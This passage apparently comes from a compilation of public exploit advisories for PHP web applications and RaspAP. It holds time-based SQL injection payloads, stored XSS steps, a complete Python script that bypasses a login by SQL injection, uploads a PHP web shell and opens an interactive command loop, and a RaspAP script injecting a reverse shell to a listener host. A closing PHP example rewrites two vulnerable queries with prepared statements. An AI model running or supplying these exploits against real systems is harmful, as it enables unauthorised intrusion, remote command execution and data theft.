    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1
    Content-Type: multipart/form-data; boundary=---------------------------17781030011592905058578147050
    Content-Length: 767
    Connection: close
    Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
    Upgrade-Insecure-Requests: 1

    ---
    Parameter: id (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 6874 FROM (SELECT(SLEEP(5)))ZCjC) AND 'GIau'='GIau
    ---

-----------------------------------------------------------------------------------------------------------------------

# Vulnerable Request when logged in as Admin:

    POST /laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18
    Content-Type: multipart/form-data; boundary=---------------------------167059892515401580571429373524
    Content-Length: 886
    Connection: close
    Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
    Upgrade-Insecure-Requests: 1

    ---
    Parameter: id (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=18' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))odDG) AND 'wCli'='wCli
    ---
22. # Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 2021-08-19
# Exploit Author: Azumah Foresight Xorlali
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux

Step 1: Log in to the application with any valid user credentials.
Step 2: Select User Management and click "add new user".
Step 3: Fill in the required details and type "<script>alert(document.domain)</script>" in the address box, or type it in a notepad and paste it into the firstname and lastname fields, since the form doesn't allow you to type special characters into those fields.
Step 4: Click on Submit
23. # Exploit Title: Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 20-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: V1
# Category: Webapps
# Tested on: Linux/Windows

# Online Traffic Offense Management System
# contains a file upload vulnerability that allows for remote
# code execution against the target. This exploit requires
# the user to be authenticated, but a SQL injection in the login form
# allows the authentication controls to be bypassed
# File uploaded from "/admin/?page=user" has no validation check
# and the directory it is placed in allows for execution of PHP code.

    """
    (hltakydn@SpaceSec)-[~/Exploits-db/traffic_offense]
    $ python2 exploit.py

    Example: http://example.com

    Url: http://trafficoffense.com

    [?] Check Adress

    [+] Bypass Login

    [+] Upload Shell

    [+] Exploit Done!

    $ whoami
    www-data
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    $ pwd
    /var/www/html/uploads
    $
    """

    #!/usr/bin/env python2
    import requests
    import sys  # needed for the sys.exit() call in the connection error path
    import time
    from bs4 import BeautifulSoup

    print ("\nExample: http://example.com\n")
    url = raw_input("Url: ")

    payload_name = "evil.php"
    payload_file = "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

    if url.startswith(('http://', 'https://')):
        print "Check Url ...\n"
    else:
        print "\n[?] Check Adress\n"
        url = "http://" + url

    try:
        response = requests.get(url)
    except requests.ConnectionError as exception:
        print("[-] Address not reachable")
        sys.exit(1)

    session = requests.session()
    request_url = url + "/classes/Login.php?f=login"
    post_data = {"username": "'' OR 1=1-- '", "password": "'' OR 1=1-- '"}
    bypass_user = session.post(request_url, data=post_data)

    if bypass_user.text == '{"status":"success"}':
        print ("[+] Bypass Login\n")
        cookies = session.cookies.get_dict()
        req = session.get(url + "/admin/?page=user")
        parser = BeautifulSoup(req.text, 'html.parser')
        userid = parser.find('input', {'name':'id'}).get("value")
        firstname = parser.find('input', {'id':'firstname'}).get("value")
        lastname = parser.find('input', {'id':'lastname'}).get("value")
        username = parser.find('input', {'id':'username'}).get("value")

        request_url = url + "/classes/Users.php?f=save"
        headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryxGKa5dhQCRwOodsq", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
        data = "------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ userid +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+ firstname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+ lastname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+ username +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+ payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n" + payload_file +"\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq--\r\n"
        upload = session.post(request_url, headers=headers, cookies=cookies, data=data)
        time.sleep(2)

        if upload.text == "1":
            print ("[+] Upload Shell\n")
            time.sleep(2)
            req = session.get(url + "/admin/?page=user")
            parser = BeautifulSoup(req.text, 'html.parser')
            find_shell = parser.find('img', {'id':'cimg'})
            print ("[+] Exploit Done!\n")

            while True:
                cmd = raw_input("$ ")
                headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'}
                request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)
                print request.text.replace("<pre>" ,"").replace("</pre>", "")
                time.sleep(1)

        elif upload.text == "2":
            print ("[-] Try the manual method")
            request_url = url + "/classes/Login.php?f=logout"
            cookies = session.cookies.get_dict()
            headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "sec-ch-ua-mobile": "?0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
            session.get(request_url, headers=headers, cookies=cookies)

        else:
            print("[!]An unknown error")

    else:
        print ("[-] Failed to bypass login panel")
24. # Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
# Date: 23.08.2021
# Exploit Author: Moritz Gruber <[email protected]>
# Vendor Homepage: https://raspap.com/
# Software Link: https://github.com/RaspAP/raspap-webgui
# Version: 2.6.6
# Tested on: Linux raspberrypi 5.10.52-v7+

    import requests
    from requests.api import post
    from requests.auth import HTTPBasicAuth
    from bs4 import BeautifulSoup
    import sys, re

    if len(sys.argv) != 7:
        print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
        sys.exit()
    else:
        target_host = sys.argv[1]
        target_port = sys.argv[2]
        username = sys.argv[3]
        password = sys.argv[4]
        listener_host = sys.argv[5]
        listener_port = sys.argv[6]

    endpoint = "/wpa_conf"
    exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    url = "http://{}:{}/{}".format(target_host,target_port,endpoint)

    s = requests.Session()
    get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
    soup = BeautifulSoup(get_Request.text, "lxml")
    csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")

    post_data = {
        "csrf_token": csrf_token,
        "connect": "wlan; {}".format(exploit)
    }

    post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))

    if post_Request.status_code:
        print("Exploit send.")
    else:
        print("Something went wrong.")

    print("Done")
25. # Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Tested on: Linux (Ubuntu 20.04) using LAMPP

## SQL Injection
# Vulnerable page
http://localhost/PhoneBook/index.php

# Vulnerable parameter
username1 & password

# POC
Username = ' or sleep(5)='-- -
Password = ' '

Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"

# Vulnerable Code
index.php line 13

    $sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
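A parameterized rewrite of the two query patterns quoted above, the `savestaffedit.php` update from post 16 and the PhoneBook `index.php` login from post 25, as an added example that is not code from either advisory or from the applications themselves. It assumes `$dbcon` is an open mysqli connection and, for the login, a `password_hash` column holding `password_hash()` output in place of the plaintext `password` column the original compares inside SQL.

```php
<?php
// Added example, not part of any advisory above. Both vulnerable queries
// spliced request fields straight into SQL text; here every value is bound
// through a mysqli prepared statement, so a payload such as
// "' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- " is compared as a literal
// string and never reaches the parser as SQL.
declare(strict_types=1);

// Make driver failures throw instead of returning false, so a failed
// prepare() cannot be silently followed by an execute() on a bool.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Replacement for the savestaffedit.php update (post 16). The original chose
 * between two query strings depending on whether $status was empty; the same
 * branch is kept, but only the SQL template changes and every value is bound.
 * Table and column names are the ones quoted in the advisory.
 */
function updateStaff(mysqli $dbcon, string $staffid, string $fname, string $oname, string $status): int
{
    if ($status === '') {
        $stmt = $dbcon->prepare(
            'UPDATE userlogin SET surname = ?, othernames = ? WHERE staffid = ?'
        );
        $stmt->bind_param('sss', $fname, $oname, $staffid);
    } else {
        $stmt = $dbcon->prepare(
            'UPDATE userlogin SET surname = ?, status = ?, othernames = ? WHERE staffid = ?'
        );
        $stmt->bind_param('ssss', $fname, $status, $oname, $staffid);
    }
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

/**
 * Replacement for the PhoneBook index.php login (post 25). The username is
 * bound, so "' or sleep(5)='-- -" matches no row instead of altering the
 * WHERE clause. The password is checked in PHP with password_verify()
 * against a stored hash (assumed column: password_hash), not in SQL.
 * get_result() requires the mysqlnd driver, which is the default build.
 */
function authenticate(mysqli $dbcon, string $username, string $password): ?array
{
    $stmt = $dbcon->prepare('SELECT * FROM userdetails WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Same failure path for an unknown user and a wrong password, so the
    // response does not reveal which of the two was incorrect.
    if ($row === null || !password_verify($password, (string) $row['password_hash'])) {
        return null;
    }
    return $row;
}

// Hypothetical glue for savestaffedit.php: read the POST fields as plain
// strings and let the driver handle quoting. No escaping is needed because
// nothing is interpolated into the query text.
// updateStaff($dbcon, $_POST['staffid'] ?? '', $_POST['fname'] ?? '',
//             $_POST['oname'] ?? '', $_POST['status'] ?? '');
```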